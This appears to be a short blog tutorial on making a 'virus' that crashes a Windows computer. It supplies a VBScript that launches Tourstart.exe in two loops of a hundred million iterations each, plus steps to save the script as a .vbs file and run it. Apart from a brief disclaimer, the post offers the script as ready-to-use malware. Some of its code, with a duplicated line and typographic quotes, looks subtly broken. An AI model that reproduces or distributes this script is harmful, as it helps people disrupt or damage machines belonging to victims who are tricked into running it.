Virus That Crashes the Computer
Hello, Friends Today we are Going to make a "Virus that Crashes the Computer"
So Friends, Today we creating a Virus That Crashes the Computer. So please don't try to run this Virus On your own Computer. This Virus is very dangerous for Computer. This can Harm your Computer very badly. I will not be Responsible for any Damage done to your Computer. Do all the Practical on your Own risk.
In this Post, We are going to develop a "Virus" which Crashes the Computer. To Develop this Virus i am going to use Visual Basic Script.
After opening the Virus Computer get Crash. There is no other way to protect your Computer.
[Note] This Post is only for Educational Purpose.
Steps to Create Virus
1. Go to Start Menu.
2. Open Notepad.
3. Just copy & Paste the Code Given Below.
_______________CODE_______________
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
____________________________________
4. Save this file with ".vbs" Extension.
5. Your Virus is Completed. It is ready to Run.
_________________________Thank You_________________________
No comments:
Post a Comment